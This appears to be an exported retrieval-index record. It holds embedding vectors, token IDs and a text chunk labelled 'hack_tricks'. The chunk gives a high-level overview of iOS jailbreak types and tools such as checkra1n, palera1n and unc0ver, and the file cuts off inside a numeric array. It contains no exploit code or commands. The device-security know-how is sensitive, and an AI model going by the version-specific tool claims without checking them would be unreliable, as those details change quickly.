-0.7314464449882507, 0.6844322085380554, 0.12413143366575241, -0.981245219707489, 0.5697820782661438, 0.10744108259677887, 0.00022488310059998184, -0.00823412835597992, -0.4186969995498657, -0.9371020793914795, -0.39627400040626526, -0.5247671604156494, 0.48133280873298645, -0.09295667707920074, -0.5878888368606567, 0.22224077582359314, 0.05532100051641464, 0.00896899588406086, -0.49895721673965454, -0.0832524225115776, -0.6525248289108276, -0.1418541967868805, 0.2217494696378708, -0.9692132472991943, 1.0745832920074463, -0.44774484634399414, 0.5190901756286621, 0.08041321486234665, 0.016165418550372124, 0.24835412204265594, 0.0922982469201088, -0.07890821993350983, 0.9650843739509583, 0.710312008857727, -0.6271047592163086, -0.2197173535823822, -0.026214590296149254, 0.6218377947807312, 0.6247581839561462, 0.03354083001613617, -0.9337479472160339, 0.816024661064148, -0.5576573610305786, -0.9425839781761169, 0.5290327072143555, -0.3756699860095978, 0.15515337884426117, -0.5078692436218262, -0.49507251381874084, 0.05818823724985123, -0.3684685528278351, -0.3474484086036682, 0.968878448009491, 0.09323077648878098, 0.5526159405708313, -0.857237696647644, 0.483104407787323, 1.069571614265442, -0.7390013337135315, 0.12588246166706085, -0.42171719670295715, 0.6515565514564514, -0.08080766350030899, -0.2591656744480133, -0.05032774433493614, -0.6940122842788696, -0.14868417382240295, 0.4180111885070801, 0.14797525107860565, 0.5801525115966797, 0.07757119834423065, -0.4915851354598999, 0.4475865066051483, -0.332990437746048, 0.6361056566238403, 0.06610378623008728, 0.8269748091697693, 0.5502356290817261, -0.4237078130245209, -0.564622163772583, -0.029792437329888344, -0.34179922938346863, -0.015129540115594864, 0.669806957244873, 0.6983976364135742, -0.777876079082489, 1.3725919723510742, 0.13987012207508087, -0.9295545220375061, -0.8406231999397278, -0.9721463918685913, -0.03851089999079704, -0.1010076105594635, -0.38677310943603516, -0.004940320271998644, 0.16573166847229004, 0.7496318817138672, -0.4000212848186493, 0.3293408453464508, -0.04245639219880104, -0.10512322932481766, 0.05148964747786522, 0.025544341653585434, 0.1686568260192871, -0.22573912143707275, 0.7032188773155212, -0.6638140082359314, -0.7778943181037903, -0.4201428294181824, 0.43017569184303284, 0.06993978470563889, -0.06876488029956818, 1.0195523500442505, -0.5913363695144653, -0.36448726058006287, -0.13452017307281494, -0.1611006110906601, 0.08357267081737518, 0.3898860812187195, 0.2729429006576538, 0.8095089793205261, -0.13472028076648712, -1.0069875717163086, -0.4380577802658081, 0.09714590013027191, -0.20741777122020721, -0.14570949971675873, -0.3369596004486084, 0.212020605802536, -0.32415685057640076, 0.25185468792915344, -0.5507227182388306, -0.7761479616165161, -0.7872194647789001, -0.8682093620300293, -0.12362612783908844, 0.34356990456581116, -0.6878591179847717, 0.46080824732780457, -0.11920617520809174, -0.2709985673427582, 0.08957179635763168, -0.2530617117881775, 0.3864741921424866, -0.18935143947601318, 0.22142578661441803, -0.6806721687316895, 0.289091020822525, -0.5359350442886353, -0.8597081303596497, -0.42747047543525696, -0.406520277261734, -0.0885896310210228, -0.4540942907333374, -0.4629072844982147, 0.21841125190258026, -0.8340169191360474, 0.7132421135902405, -0.11152220517396927, -0.22007323801517487, 0.033543284982442856, -0.486725389957428, 0.2528662085533142, 0.7425563931465149, -0.6306397318840027, -0.09954454749822617, -0.0775541439652443, 0.39594125747680664, 0.7358341813087463, -0.4473869800567627, 0.7559328079223633, -0.1578560173511505, 0.7478122115135193, 0.0009939237497746944, -0.06260187923908234, -0.632285475730896, 0.579010009765625, 0.047092538326978683, -0.7619374990463257, -0.20018894970417023, -0.47834402322769165, 0.13357360661029816, -0.28329384326934814, 0.146937757730484, -0.04135648161172867, 0.6469030380249023, 0.7610985636711121, 0.3868393898010254, -0.4358881115913391, 0.7503189444541931, 0.299282044172287, 0.1903599351644516, 0.2429754137992859, 0.576016366481781, -0.10163567960262299, -0.36484870314598083, 0.07866465300321579, -0.032181426882743835, -0.35208308696746826, -0.24344401061534882, -0.6228111386299133, -0.25409483909606934, 0.26532161235809326, 0.05379980057477951, 0.27309080958366394, -0.0997895672917366, 0.5248791575431824, 0.584622323513031, -0.004279476590454578, -0.0705675557255745, -0.85655277967453, -0.09547743946313858, -1.153519868850708, -0.16799521446228027, 0.27205726504325867, -0.09345994889736176, -0.38966843485832214, 0.14282715320587158, 0.786520779132843, -0.0273049958050251, -0.04920297861099243, 0.6277772188186646, 0.2833239734172821, -0.2829831540584564, 0.08492040634155273, 1.1494886875152588, -0.7488812804222107, -0.4836503565311432, -0.35572633147239685, 0.239135280251503, -0.01716414839029312, -0.7129220366477966, -0.023517662659287453, 0.7444519400596619, 0.32710257172584534, -0.6831989884376526, -0.25121891498565674, -0.6442122459411621, 0.9011967182159424, 0.07090967893600464, 0.273597776889801, 0.103446826338768, -1.0394983291625977, 0.6933211088180542, -0.580130934715271, -0.33058568835258484, -0.13910453021526337, -0.26352328062057495, 0.35344597697257996, 0.12549926340579987, -0.027229029685258865, 0.9108924865722656, 0.13722443580627441, 0.18639832735061646, 0.7927678823471069, 0.5130515694618225, 0.7946809530258179, -0.12802843749523163, 0.4223208427429199, -0.5345029234886169, 0.248518705368042, -0.2600618898868561, 0.2307344675064087, 0.014370339922606945, -0.029968880116939545, 0.2676396071910858, -0.6441115736961365, 0.4510960876941681, 0.26821911334991455, -0.23356382548809052, -0.421098530292511, -0.13987666368484497, -0.6472850441932678, 0.007103344425559044, -0.19820234179496765, -0.21900446712970734, -0.13283945620059967, -0.0028802319429814816, 0.1285713165998459, -0.04928522929549217, 0.31563013792037964, 0.8722415566444397, -0.7021307349205017, 0.783187210559845, 0.8109892010688782, -0.0029240716248750687, 0.010071145370602608, -0.43496328592300415, -0.41827407479286194, -0.06420876085758209, 1.0234782695770264, -0.05694345012307167, -0.697007954120636, 0.4983523488044739, 0.12356959283351898, -0.04546377807855606, 0.47850608825683594, -0.07388342916965485, -0.8113770484924316, 0.1409909725189209, 0.22692450881004333, -1.0168015956878662, -0.5769666433334351, -0.20298784971237183, 0.4128330647945404, -0.5674401521682739, 0.18765467405319214, -0.3021814227104187, 0.37503835558891296, -0.4359655976295471, 0.5010129809379578, -0.263357549905777, 0.3135049343109131, 0.3742358684539795, -0.7773158550262451, -1.1543914079666138, 0.48138532042503357, -0.16072696447372437, 0.2478611022233963, -0.23732741177082062, 0.3781810998916626, -0.0586172454059124, 0.5131081938743591, 0.05531995743513107, -0.5302278399467468, 0.1667783260345459, -0.22433432936668396, -0.320105642080307, -0.28750079870224, -0.25098690390586853, -0.44819918274879456, 1.2107524871826172, 0.5296062231063843, 0.2764875292778015, 0.06865010410547256, -0.08460672199726105, -0.4931185245513916, -0.5975854396820068, -0.5983731746673584, -0.023265307769179344, -0.6116176247596741, 0.17336848378181458, -0.20959064364433289, 0.2193758338689804, 0.4341818392276764, -0.23382951319217682, -0.4773866534233093, -0.0835670605301857, 0.27224817872047424, -0.040818892419338226, 0.9784750938415527, -0.4294828772544861, -0.6281207799911499, 0.6012633442878723, -0.9156372547149658, -0.641629695892334, -0.04954541474580765, -0.6127250790596008, 0.34014251828193665, 0.3319384455680847, -0.05391473323106766, 0.36624810099601746, 0.5399302244186401, 0.2688213884830475, -0.36573731899261475, 0.410492479801178, 0.5241307616233826, -0.5544203519821167, 0.30687057971954346, 0.12139163166284561, 0.046626605093479156, -0.14631791412830353, -0.5307546854019165, 0.5302636027336121, -0.7128244042396545, -0.2420390248298645, -0.27074480056762695, -0.22369688749313354, -1.1500968933105469, -0.6959385871887207, 0.3531266152858734, -0.20755693316459656, -0.13939368724822998, 0.17773771286010742, -0.9923455119132996, 0.2683986723423004, -0.6161221861839294, 0.3971971571445465, 0.09923043847084045, -0.2565002143383026, 0.1703844517469406, -0.033295731991529465, 0.5225376486778259, -1.2322865724563599, 4.2985100746154785, 0.5394747853279114, -0.22228556871414185, 0.1954093873500824, 0.6033397316932678, 0.6315910220146179, 0.9360648989677429, -0.13020829856395721, 0.30115634202957153, -0.6534725427627563, 0.19163194298744202, -0.5426603555679321, 0.7402239441871643, 0.6429190039634705, 0.4036317765712738, -0.17567086219787598, -0.0334002710878849, 0.6873511075973511, 0.20518091320991516, -0.623243510723114, -0.9595114588737488, -0.16040918231010437, -0.44935840368270874, 1.1418918371200562, 0.22322490811347961, 0.27380427718162537, 0.04060187563300133, -0.34217923879623413, -0.464302659034729, 0.05642007663846016, -0.1389162391424179, -0.5734906792640686, 0.4411456286907196, -0.2974567711353302, -0.6689261794090271, 0.4585871994495392, 0.6955265998840332, -0.3478134572505951, -0.16188359260559082, -0.108036570250988, 0.376817524433136, -0.07324527204036713, 0.37108543515205383, 0.09865103662014008, 0.019168531522154808, 1.0649802684783936, -0.4484698474407196, -0.29631510376930237, 0.6621875762939453, -0.47412723302841187, 0.8210879564285278, -0.5421669483184814, -0.010506569407880306, -0.21339620649814606, -0.16019946336746216, 0.23621349036693573, -0.14221523702144623, -0.5475068092346191, 0.36547085642814636, -0.4334557056427002, 0.5816758871078491, -0.736982524394989, 0.13840323686599731, -0.5137814283370972, -0.6828200817108154, 0.46757468581199646, -0.1770506054162979, 1.0592336654663086, 0.3340102732181549, -0.5982792973518372, -0.09479058533906937, -0.5792550444602966, -0.9395897388458252, -0.5191320180892944, 1.1610543727874756, -0.000014935154467821121, 0.18099983036518097, 0.6381531357765198, -0.12806028127670288, -0.33869147300720215, -0.4232407808303833, -0.8887910842895508, -0.6293724179267883, 0.35327550768852234, 0.5294458866119385, 0.2662930488586426, 0.01163347065448761, -1.095280408859253, 0.30393821001052856, 0.3320825695991516, 0.6086003184318542, 0.5740640759468079, -0.08138719201087952, 0.3764853775501251, -0.03284263610839844 ]
[ 1996, 2878, 2291, 2007, 1037, 15685, 7661, 17083, 1012, 20397, 4995, 1005, 1056, 3223, 2000, 6855, 7117, 3229, 2004, 2146, 2004, 1996, 9573, 11066, 2121, 2003, 7801, 1012, 12659, 7661, 17083, 2015, 1024, 2023, 4473, 2017, 2000, 5672, 1996, 9808, 2008, 1005, 1055, 2770, 2006, 1996, 5080, 2044, 2017, 19829, 1996, 9573, 11066, 2121, 1012, 1996, 9573, 11066, 2121, 2089, 5478, 2019, 18077, 2000, 19829, 2009, 1012, 2006, 16380, 5733, 1010, 12659, 1037, 7661, 17083, 2003, 5263, 2138, 1996, 16380, 9573, 11066, 2121, 2069, 4473, 6207, 1011, 2772, 4871, 2000, 2022, 9573, 2098, 1998, 8373, 1012, 2023, 2003, 2339, 2130, 2880, 16380, 4871, 2064, 1005, 1056, 2022, 5361, 2065, 2027, 4995, 1005, 1056, 2772, 2011, 6207, 1010, 1998, 2009, 3084, 16380, 2091, 24170, 2015, 2069, 2825, 2005, 2004, 2146, 2004, 1996, 3025, 16380, 2544, 2003, 2145, 2772, 1012, 1996, 3800, 1997, 7173, 23890, 2075, 2003, 2000, 4487, 19150, 16380, 28548, 1006, 6207, 1005, 1055, 3642, 6608, 10595, 1999, 3327, 1007, 2061, 2008, 15275, 27121, 3642, 2064, 2448, 2006, 1996, 5080, 1006, 1041, 1012, 1043, 1012, 7661, 3642, 2030, 22817, 2013, 4522, 10439, 5324, 2107, 2004, 22330, 9032, 2030, 9033, 2571, 2080, 1007, 1012, 1996, 2773, 1000, 7173, 23890, 1000, 2003, 1037, 8902, 4135, 15549, 2389, 4431, 2000, 2035, 1011, 1999, 1011, 2028, 5906, 2008, 8285, 8585, 1996, 4487, 3736, 9709, 2832, 1012, 7173, 23890, 2075, 16852, 3900, 4014, 23890, 2075, 2019, 16380, 5080, 2003, 3352, 2062, 1998, 2062, 8552, 2138, 6207, 7906, 28751, 2075, 1996, 2291, 1998, 8983, 2075, 1996, 18516, 24728, 19666, 6906, 14680, 1012, 7173, 23890, 2075, 2038, 2468, 1037, 2200, 2051, 1011, 7591, 7709, 2138, 6207, 6762, 6608, 2122, 8211, 4617, 4659, 2574, 2044, 8287, 1037, 8081, 1006, 4983, 1996, 7173, 23890, 6666, 2013, 8051, 1011, 2241, 24728, 19666, 6906, 14680, 1010, 2107, 2004, 1996, 14123, 2527, 2487, 2078, 18077, 12473, 1996, 9573, 21716, 1997, 1996, 18059, 1018, 1998, 25249, 1015, 1007, 1012, 2023, 2965, 2008, 2017, 2064, 1005, 1056, 2091, 24170, 2000, 1037, 3563, 16380, 2544, 2320, 6207, 6762, 6608, 1996, 3813, 8059, 1012, 2065, 2017, 2031, 1037, 7173, 29162, 5080, 2008, 2017, 2224, 2005, 3036, 5604, 1010, 2562, 2009, 2004, 2003, 4983, 2017, 1005, 2128, 2531, 1003, 2469, 2008, 2017, 2064, 2128, 1011, 7173, 23890, 2009, 2044, 25925, 2000, 1996, 6745, 16380, 2544, 1012, 16380, 18739, 2024, 2241, 2006, 1037, 4119, 1011, 3433, 2832, 1006, 11717, 1996, 2061, 1011, 2170, 14021, 4095, 1038, 4135, 5910, 2004, 1037, 2765, 1007, 1012, 1996, 5080, 2097, 3499, 1996, 9808, 8272, 2069, 2065, 1996, 3433, 2000, 1996, 4119, 2003, 2772, 2011, 6207, 1012, 2023, 2003, 2054, 6950, 2655, 1037, 1000, 6608, 3332, 1000, 1010, 1998, 2009, 2003, 1996, 3114, 2017, 2064, 1005, 1056, 3432, 3573, 1996, 27178, 2050, 3813, 8059, 7427, 2017, 22817, 1998, 7170, 2009, 3031, 1996, 5080, 7188, 2017, 2215, 2000, 1012, 2076, 3576, 16380, 18739, 1010, 2048, 4617, 2089, 2119, 2022, 2772, 2011, 6207, 1006, 1996, 6745, 2028, 1010, 1998, 1996, 3025, 16380, 2544, 1007, 1012, 2023, 2003, 1996, 2069, 3663, 1999, 2029, 2017, 2064, 2091, 24170, 1996, 16380, 5080, 1012, 2017, 2064, 4638, 1996, 2783, 6608, 3332 ]
hack_tricks
431.txt
2
and download ota firmware from the ipsw downloads website. updating the os removes the effect of jailbreaking. jailbreak typestethered jailbreaks don't persist through reboots, so re - applying jailbreaks requires the device to be connected ( tethered ) to a computer during every reboot. the device may not reboot at all if the computer is not connected. semi - tethered jailbreaks can't be re - applied unless the device is connected to a computer during reboot. the device can also boot into non - jailbroken mode on its own. semi - untethered jailbreaks allow the device to boot on its own, but the kernel patches ( or user - land modifications ) for disabling code signing aren't applied automatically. the user must re - jailbreak the device by starting an app or visiting a website ( not requiring a connection to a computer, hence the term untethered ). untethered jailbreaks are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken. jailbreaking toolsdifferent ios versions require different jailbreaking techniques. determine whether a public jailbreak is available for your version of ios. beware of fake tools and spyware, which are often hiding behind domain names that are similar to the name of the jailbreaking group / author. version examples : checkra1n : works on devices having the a7 chip and as new as the a11 chip, e. g. iphone 5s up to iphone x. palera1n : checkm8 devices ( a8 - a11 ) on ios 15. 0 - 16. 5. unc0ver : only works only for ios versions up to 14. 8, since apple patched the issues that allowed unc0ver to runthe ios jailbreak scene evolves so rapidly that providing up - to - date instructions is difficult. however, we can point you to some sources that are currently reliable : can i jailbreak? the iphone wikiredmond piereddit jailbreakhttps : / / checkra. in / note that any modification you make to your device is at your own risk. while jailbreaking is typically safe, things can go wrong and you may end up bricking your device. no other party except yourself can be held accountable for any damage. benefitsthe most important side effect of jailbreaking is that it removes any
[ 0.3011628985404968, -0.5268455147743225, -0.22414912283420563, 0.6071267127990723, -0.015684574842453003, -0.4711775779724121, -0.3567230999469757, 0.05166865885257721, 0.4185734689235687, 0.5047422647476196, 0.1709933876991272, -0.034300364553928375, 0.0015156068839132786, -0.5842911601066589, 0.1065727174282074, -0.22695313394069672, -0.7701581120491028, 0.10465976595878601, -0.678601861000061, -0.47946110367774963, 0.0718647837638855, -0.010916539467871189, -0.482864648103714, -0.8473643064498901, -0.4447402060031891, 0.6512590050697327, 0.8510846495628357, 0.44557830691337585, 0.3935224115848541, 1.1386370658874512, 0.14582698047161102, 0.15063005685806274, 0.43569353222846985, -0.541432797908783, 0.04598469287157059, 0.1704673171043396, 0.7619176506996155, -0.19812490046024323, -0.08997073024511337, -0.8207420706748962, 0.5645877122879028, -0.2070225030183792, 0.43241333961486816, -0.21959291398525238, -0.8252850770950317, -0.31946253776550293, -0.22035162150859833, -0.44596701860427856, 0.17422381043434143, -0.0789625272154808, -0.07138431817293167, 0.16870033740997314, -0.4424409568309784, 0.6708943843841553, 0.20133249461650848, 0.253243625164032, 0.36100879311561584, 0.3095104694366455, -0.6613265872001648, 0.6568604707717896, -0.1991908997297287, 0.4176601469516754, 0.25103116035461426, -0.7867655158042908, -0.3453904986381531, 0.8461495041847229, -0.3436892330646515, -0.2312202751636505, -0.38252928853034973, -0.038735829293727875, -0.04575979709625244, 0.6057274341583252, -0.6438523530960083, -0.08757112920284271, -0.5044999718666077, -0.10906187444925308, -0.33121174573898315, -0.24639080464839935, -0.1515984833240509, 0.680351734161377, -0.03110661543905735, 0.804557204246521, 0.20410610735416412, -0.004675352014601231, -0.4352467358112335, -0.4582212567329407, -0.16813364624977112, -0.3540050685405731, -0.7526302337646484, -0.0909910574555397, 0.6341063976287842, 0.6073090434074402, -0.7864901423454285, -0.41778963804244995, 0.8082248568534851, 0.5840773582458496, -0.6653663516044617, -0.44315850734710693, 0.04882344231009483, 0.4418586194515228, 0.8562500476837158, 0.08877776563167572, 0.2066241353750229, 0.5952357053756714, -0.8440491557121277, -0.09192728996276855, 0.5000081658363342, -0.40807589888572693, -0.5466051697731018, -0.57395339012146, 0.7466426491737366, 0.16973502933979034, 0.35042378306388855, -0.2367641180753708, 0.002976419171318412, 0.23822547495365143, 0.6364083886146545, -0.5362155437469482, -0.44879770278930664, 0.7261087894439697, -0.384793758392334, -0.31416231393814087, 0.5453482270240784, -0.3115697503089905, 0.49501946568489075, -0.07720040529966354, 0.289372980594635, 0.5849719047546387, -0.4188080132007599, -0.7013998031616211, -0.042320333421230316, -0.06969398260116577, 0.27474960684776306, 0.6185196042060852, -0.6776718497276306, -0.160788431763649, 0.5441489219665527, 0.5031518936157227, 0.35253581404685974, -1.014477014541626, -0.14890547096729279, 0.13893060386180878, -0.162240669131279, 1.0300428867340088, 0.40690863132476807, -0.05606067180633545, -0.3656950294971466, 0.09666851162910461, -0.8670257925987244, 0.1743210107088089, 0.03320396691560745, 0.323866069316864, 0.5742745995521545, -0.22293990850448608, -0.4941658675670624, 0.6396128535270691, -0.5481308698654175, 1.2322298288345337, -0.536820113658905, 0.006422113627195358, 0.18607240915298462, 0.6418731212615967, 0.5658761858940125, 0.1548841893672943, -0.7190793752670288, -0.08427981287240982, -0.7273665070533752, -0.7045623660087585, -0.5365403294563293, 0.17267875373363495, -0.05284155532717705, 0.3254374563694, 0.0949544608592987, -0.15452612936496735, 1.7142733335494995, 0.5809731483459473, -0.33169853687286377, -0.012874727137386799, 0.09638131409883499, 0.6317518353462219, -0.1789483278989792, 0.5372529029846191, 0.5420083999633789, 0.5412423014640808, -0.1883242279291153, -0.29975152015686035, -0.23129507899284363, -0.6872526407241821, -0.16515684127807617, -0.058166105300188065, -0.8091776371002197, 1.2068533897399902, -0.45800021290779114, 0.11323647946119308, 0.8199418187141418, -0.2788212299346924, -1.5253617763519287, -0.7405611276626587, -0.7229636311531067, -1.0913032293319702, -0.4001830816268921, -0.3800192177295685, 0.20886631309986115, 0.4199293553829193, -0.2738635838031769, -0.03936656564474106, 0.7215402126312256, 0.7310815453529358, -0.036669254302978516, 0.7961589097976685, 0.6777170300483704, -0.35421034693717957, -0.38955065608024597, 0.4175807237625122, -0.19574643671512604, -0.016270330175757408, -0.03223912790417671, 0.586560070514679, -0.4694259762763977, 0.37142860889434814, 0.13982439041137695, 0.6103121638298035, 1.2015496492385864, 0.6331065893173218, -0.15764518082141876, -0.5567566752433777, 0.5759914517402649, 0.2098579704761505, -0.3002477288246155, -0.2780066728591919, -0.14166708290576935, 0.4867610037326813, 0.3985532224178314, 0.615960955619812, 0.013712640851736069, -0.2102804332971573, -0.5043290257453918, 0.10884961485862732, 0.36377301812171936, -0.047644104808568954, 0.11424019187688828, 0.6965540647506714, 0.23719225823879242, 0.05968161299824715, 0.755074679851532, 0.2382289320230484, -0.4598414897918701, -0.05565090477466583, 0.894565999507904, 0.6084050536155701, 0.33556267619132996, 0.7064689993858337, 0.7012686729431152, -0.19285251200199127, -0.9416971802711487, -0.7416749000549316, 0.6829204559326172, 0.8358232975006104, -0.6948596239089966, -1.0085426568984985, -0.07009285688400269, 0.3859855532646179, -0.382343053817749, -0.09645256400108337, 0.2487177550792694, 0.9608117938041687, -0.2561992108821869, 0.5120334625244141, -0.1876615732908249, -0.9534504413604736, -0.9646679759025574, -0.10324589908123016, -0.5435634255409241, -0.5695365071296692, -0.7186274528503418, 0.0740404948592186, 0.2890556752681732, -0.5406231880187988, 0.8971599340438843, -0.1026517003774643, -0.5692703127861023, 0.24442049860954285, 0.6746475696563721, -0.1884881854057312, 0.06061575561761856, -0.1918630301952362, -0.8120405673980713, 0.14698803424835205, 0.0895317867398262, 0.8483725786209106, 0.32472333312034607, -0.5821536779403687, -0.3795854449272156, -0.3280693292617798, -0.18364165723323822, -0.2737032175064087, 0.41811123490333557, 0.44888433814048767, -0.09020189195871353, 0.02955011837184429, -0.09629011899232864, 0.06352699548006058, -0.14682361483573914, 0.4825749099254608, -0.45645013451576233, 1.075196623802185, 0.1943807303905487, -0.2650860548019409, 0.5481773614883423, 0.626716136932373, -1.0262656211853027, 0.03102431260049343, -0.043297573924064636, 1.1296788454055786, -0.10154426842927933, 0.2456587851047516, 0.5521469116210938, -0.11306242644786835, -0.3163225054740906, 0.1628084033727646, -0.10005761682987213, -0.497579962015152, -0.3001888692378998, -0.6118642687797546, -0.17218343913555145, -0.13683021068572998, 0.07174873352050781, -0.9371252059936523, 0.420917272567749, -0.5446680188179016, -0.5085158944129944, 0.12027222663164139, -0.24166367948055267, 1.0825093984603882, -0.1321273297071457, -0.03649523854255676, -0.11442285031080246, 0.008396795019507408, 0.42541196942329407, 0.8654743432998657, 0.09236184507608414, -0.27699363231658936, 0.5724223852157593, -0.06819882243871689, -0.7164798974990845, 0.735270619392395, 0.3056831955909729, -0.367251992225647, -0.2830895483493805, 0.21772746741771698, -0.616405189037323, -0.3988565504550934, 0.15145140886306763, 0.30779293179512024, 0.33126190304756165, 0.5132901072502136, -0.6493492126464844, -0.2034435123205185, -0.06909220665693283, -0.028934353962540627, 0.15829509496688843, -0.28762391209602356, 0.33835968375205994, 0.38703611493110657, -0.2546670138835907, -0.2708759903907776, -0.058432646095752716, 0.7387731671333313, 0.3424586355686188, 0.33349254727363586, 0.9473024010658264, -0.33606648445129395, 0.07558006048202515, 0.8701328039169312, -0.5042416453361511, -0.4061205983161926, 0.5375569462776184, -0.1074017584323883, 0.3851253092288971, -0.06985260546207428, 0.41416022181510925, -0.24487458169460297, 0.08689546585083008, 0.4279756546020508, 0.02241140604019165, -0.13137666881084442, -0.7451285719871521, -0.6032231450080872, 0.04450171813368797, -0.316587895154953, 0.30527225136756897, 0.010720701888203621, 0.36777395009994507, -0.8969451189041138, -0.9583112597465515, -0.26692327857017517, 0.756809413433075, 0.6456437706947327, 0.9704068303108215, 0.10973694920539856, 0.6317696571350098, 0.5518636107444763, -0.3180884122848511, 0.35693737864494324, -0.9792346358299255, 0.2437286376953125, -0.48260262608528137, 0.91661536693573, -0.7081736326217651, 0.18269681930541992, -0.20782873034477234, -0.4476083517074585, -0.7067193388938904, -0.17241381108760834, 0.07989572733640671, 0.24897950887680054, -1.007898211479187, -0.37967807054519653, -0.4458135664463043, -0.25019529461860657, -0.6257906556129456, -0.20050498843193054, -0.412657231092453, 0.4744790196418762, 0.5788121223449707, -0.6567277908325195, -0.38335227966308594, -0.659580409526825, 0.48432600498199463, 0.011672316119074821, 0.35439667105674744, -0.2051638960838318, -0.28918418288230896, -0.2492874413728714, -0.7833848595619202, -0.16797275841236115, 0.5141634345054626, 0.5674337148666382, -0.2329166978597641, -0.5901994109153748, 0.010174586437642574, 0.8396801948547363, -0.6017577052116394, -0.27321359515190125, 0.2899787127971649, 0.31521302461624146, 0.26768758893013, 0.29295292496681213, -0.33993417024612427, 0.05219509080052376, 0.0770307332277298, -1.200027346611023, 0.7087970972061157, -0.7344987988471985, -0.19805176556110382, 0.06809620559215546, 0.05814719572663307, -0.1809825748205185, 0.08984848111867905, -0.6729347705841064, 0.1451277732849121, -0.7119997143745422, 0.04555685445666313, -0.433928906917572, 0.08379639685153961, 0.4085295796394348, 0.09003899991512299, -0.37144991755485535, 0.07452502846717834, 0.5159229636192322, -0.14926446974277496, 0.18896442651748657, -0.49101629853248596, -0.5719971060752869, 0.39291587471961975, -1.0088043212890625, 0.6638496518135071, 0.15326641499996185, 0.4459049105644226, -0.5692095756530762, -0.20208962261676788, 0.6332990527153015, 0.31726932525634766, 0.370722234249115, -0.8066014647483826, -0.4966993033885956, -0.05004721134901047, -0.054590314626693726, 0.07860936969518661, 0.2600861191749573, 0.41381552815437317, 0.23392604291439056, 0.11857818812131882, 0.29104217886924744, -0.7107136249542236, -0.7997692823410034, -0.2200026661157608, -0.58101487159729, -0.03913065046072006, -0.1862146556377411, 0.3948618769645691, 0.16262777149677277, -0.461546927690506, -0.1329098641872406, -0.0066098906099796295, -0.08327538520097733, -1.0166822671890259, -0.2018548548221588, -0.602756142616272, 0.06395518034696579, 0.014817755669355392, 0.33445674180984497, 0.0395696759223938, 0.1641053557395935, 0.4470037519931793, -0.16790707409381866, 0.267845094203949, -0.4643964171409607, -0.7579986453056335, 0.31862929463386536, 0.5949724316596985, -0.1267995685338974, -0.3720357418060303, 0.5749014616012573, 0.0012223465600982308, 0.2141500860452652, -0.6286689043045044, -0.5060070753097534, -0.8639039993286133, -0.9819167256355286, 0.2837928831577301, -0.8549707531929016, 0.5852931141853333, -0.3047837018966675, -0.30199700593948364, -0.3652026653289795, 0.41502854228019714, -0.0844515860080719, -0.7899065017700195, -0.18266236782073975, -0.1487046778202057, -0.1820976734161377, -0.30560502409935, -0.39181771874427795, -0.3865678906440735, -0.6958096027374268, -0.25255393981933594, 0.6819590330123901, -0.23281453549861908, -0.14857621490955353, 0.28187090158462524, -0.10537479817867279, 0.1332523375749588, -0.1963411569595337, 0.013796341605484486, -0.2826167345046997, -0.7945157885551453, -0.15972694754600525, -0.7754536867141724, 1.1614724397659302, -0.10957501083612442, 0.3071783483028412, -0.2966262996196747, -0.37434524297714233, 0.4963753819465637, -0.1680716723203659, 0.22811704874038696, 0.3652411103248596, 0.8202313780784607, -0.5153297781944275, 0.0031571448780596256, -0.19245032966136932, 0.4183652102947235, 0.676085889339447, -0.050892867147922516, -0.9267920851707458, 0.15216375887393951, -0.24672819674015045, -1.2854288816452026, 0.6059531569480896, -0.0422990545630455, 0.15092633664608002, -0.34627896547317505, -0.39918848872184753, 0.1236085519194603, -0.2574424147605896, -0.05133942514657974, 1.0693488121032715, 0.4276031255722046, 0.5798117518424988, -0.6930956244468689, 0.7028352618217468, 0.5138237476348877, -0.45004743337631226, 0.12203275412321091, -0.2693381607532501, 0.07224024832248688, -0.15131695568561554, -0.6018518209457397, 0.06832420080900192, -0.7212823033332825, -0.20481185615062714, 0.7283836603164673, 0.1666688174009323, 0.5207197666168213, 0.17042459547519684, -0.49529221653938293, 0.39255642890930176, 0.0147924879565835, 0.5691389441490173, -0.02742692641913891, 0.3735140562057495, 0.29663950204849243, 0.3565234839916229, -0.41883835196495056, 0.42848825454711914, -0.5950244665145874, 0.3614378273487091, 0.5630918741226196, 0.4321390390396118, -0.7056401968002319, 1.150909662246704, -0.41216588020324707, -0.6934497952461243, -0.7453005909919739, -0.8658345341682434, -0.48431041836738586, -0.616001307964325, -0.45098668336868286, -0.15695251524448395, -0.11054112762212753, 0.5427517294883728, -0.3615201413631439, 0.3857874274253845, 0.03263114020228386, 0.08300954103469849, -0.08553832024335861, 0.1239999383687973, -0.3324657678604126, 0.4882128834724426, 0.8132917284965515, -1.1068745851516724, -0.8246775269508362, -1.1453410387039185, -0.6619486808776855, 0.4171847999095917, -0.3803950846195221, 0.8615703582763672, -0.6126480102539062, 0.2413773238658905, -0.23842555284500122, -0.7500530481338501, 0.38725873827934265, 0.33081260323524475, 0.3665056824684143, 0.9612486958503723, 0.5951911211013794, -1.046118140220642, -0.30228424072265625, -0.26425448060035706, 0.0903690755367279, 0.41959148645401, -0.6628615260124207, -0.02984018437564373, -0.01711556315422058, 0.32725757360458374, -0.5195545554161072, -0.793994128704071, -0.8432753086090088, -0.5626721978187561, 0.4885122776031494, 0.13201779127120972, -0.263786256313324, 0.3543463945388794, -0.040074195712804794, -0.21168813109397888, 0.025652257725596428, -0.03757255896925926, -0.055119652301073074, -0.1909281313419342, 1.084174633026123, -0.48936697840690613, 0.385696679353714, -0.349418044090271, -0.5805596113204956, -0.2837038040161133, -0.39824405312538147, -0.6059432029724121, -0.26547807455062866, -0.10441891849040985, 0.32010984420776367, -0.2932167947292328, 0.7982930541038513, -0.1329932063817978, -0.3291472792625427, 0.0943555012345314, -0.04089004546403885, 0.3938749134540558, 0.8098615407943726, -0.5732355713844299, 0.5628706812858582, 0.17926982045173645, 0.13574929535388947, 0.5249606966972351, -0.6823958158493042, 0.3204880654811859, 0.006166504230350256, 0.08010099828243256, 0.4754074811935425, -0.10333215445280075, -0.321763813495636, 0.3929675221443176, 0.089509516954422, -0.6498702168464661, -0.24003033339977264, -0.6959674954414368, -0.15551309287548065, -0.24920272827148438, 0.19092439115047455, -0.19161704182624817, 0.20978844165802002, 0.7625302076339722, 0.5394160747528076, -0.19517749547958374, 0.7422129511833191, 0.5571024417877197, -0.037116408348083496, 0.3343828320503235, 0.34044256806373596, -0.2315453588962555, -0.4514506459236145, 0.03143560513854027, 0.12175282090902328, -0.44040757417678833, -0.28120529651641846, -0.09335032850503922, -0.20863965153694153, 0.3493727147579193, 0.09807341545820236, 0.3333757221698761, 